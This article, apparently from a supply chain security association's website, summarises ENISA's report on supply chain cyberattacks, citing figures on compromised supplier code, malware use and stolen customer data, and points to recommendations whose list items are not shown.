- Standards & Certifications
- News & Events
- Incident Service
- About Tapa
It’s quite feasible that the quiet unassuming person sitting in the corner of a coffee shop in downtown Lagos, London or Lisbon tapping away contentedly on their laptop keyboard may well be about to bring a global corporation to its knees and demand millions of dollars to repair the damage.
Such is the world of the cybercriminal.
You may never know the perpetrators of these crimes. You may never understand how much is paid to them. You may never begin to contemplate that some corporations are reportedly assigning their own hackers to ‘hack back’ at those targeting them, which can be as dangerous as it sounds. What we do know, however, is that the people behind these attacks are busier than ever before. As insurer TT Club recently stated on cyber risk: ‘Be alert and expect the attack; it’s not if but when.’
The European Union Agency for Cybersecurity - also known as ENISA - agrees. The conclusion of its new study ‘Threat Landscape for Supply Chain Attacks,’ which looked at 24 such incidents between January 2020 and July 2021, is to predict a four-fold increase in supply chain software attacks in 2021.
It issues a very clear and frank assessment; strong security protection is no longer enough for organisations because attackers have already shifted their attention to suppliers, with an increasing impact such as downtime of systems, monetary loss and reputational damage. ‘You’re only as strong as your weakest link’ has never been a more pertinent statement when it comes to cybersecurity.
The EU Agency for Cybersecurity’s mapping of emerging supply chain crimes found 66% of attacks focus on the supplier’s code. “Supply chain attacks have been a concern for cybersecurity experts for many years because the chain reaction triggered by one attack on a single supplier can compromise a network of providers,” it states.
In 62% of the cases, malware was the attack technique employed. This evidence stresses the need for policymakers and the cybersecurity community to act now with novel protective measures to prevent and respond to potential supply chain attacks in the future, ENISA says.
Why is a good level of cybersecurity not good enough?
Composed of an attack on one or more suppliers with a later attack on the final target, namely the customer, supply chain attacks may take months to succeed, the EU Agency found. ‘In many instances, such an attack may even go undetected for a long time. Similar to Advanced Persistence Threat (APT) attacks, supply chain cyber incidents are usually targeted, quite complex and costly, with attackers probably planning them well in advance. All such aspects reveal the degree of sophistication of the adversaries and the persistence in seeking to succeed.’
Organisations could be vulnerable to a supply chain attack even when their own defences are quite good, ENISA adds, with attackers exploring new potential highways to infiltrate organisations by targeting their suppliers. Moreover, with the almost limitless potential of the impact of supply chain attacks on numerous customers, these types of attacks are becoming increasingly common. In order to compromise targeted customers, attackers focused on the suppliers’ code in about 66% of the reported incidents, highlighting the need for organisations to focus their efforts on validating third-party code and software before using them to ensure these were not tampered with or manipulated.
In some 58% of the supply chain incidents analysed, the customer assets targeted were predominantly customer data, including Personally Identifiable Information (PII) data and intellectual property. In 66% of the supply chain attacks reviewed, suppliers did not know or failed to report on how they were compromised.
Apply good practices and engage in coordinated actions
‘The impact of attacks on suppliers may have far-reaching consequences because of the increased interdependencies and complexities of the techniques used. Beyond the damages on affected organisations and third parties, there is a deeper cause for concern when classified information is exfiltrated and national security is at stake or when consequences of a geopolitical nature could emerge as a result. In this complex environment for supply chains, establishing good practices and getting involved in coordinated actions at EU level are both important to support all Member States in developing similar capabilities – to reach a common level of security,’ the report advises.
In the report, ENISA offers a number of recommendations for customers to manage supply chain cybersecurity risks and their supplier relationships:
Recommendations to manage cyber risk
To manage supply chain cybersecurity risk, the study recommends customers should:
Additionally, to manage their relationships with suppliers, ENISA highlights measures customers should adopt aimed at preventing cyberattacks, including:
Moreover, as any product or service is built from or based on components and software that is subject to vulnerabilities, suppliers should implement good practices for vulnerability management, such as:
The study concludes: ‘As the cost of direct attacks against well-protected organisations increases, attackers prefer to attack their supply chain, which provides the additional motivation of a potentially large-scale and cross-border impact. This migration has resulted in a larger-than-usual number of supply chain attack cases reported, with a forecast of four times more supply chain attacks in 2021 than in 2020. The inherent global nature of current supply chains increases the potential impact of these attacks and broadens the attack surface for malicious actors.
‘This report covers a number of known attacks but in reality, there may be more supply chain attacks that go undetected, not investigated or attributed to other causes. Particularly in software, supply chain attacks undermine trust in the software ecosystem. The analysis in this report shows that there are still a large number of unknown factors in the incidents investigated. 66% of the attack vectors used on suppliers remain unknown. A lack of transparency or the ability to investigate poses a serious risk to the trust of the supply chain.
‘Improving the process of transparency and accountability is the first step to improving the security of all elements in the supply chain and protecting final customers. Supply chain attacks can be complex, require careful planning and often take months or years to execute. While more than 50% of these attacks are attributed to APT groups or well-known attackers, the effectiveness of supply chain attacks may make suppliers an interesting target for other, more generic, types of attackers in the future. It is therefore critical that organisations focus their security not only in their own organisations, but also on their suppliers.’
Download the full report using this link.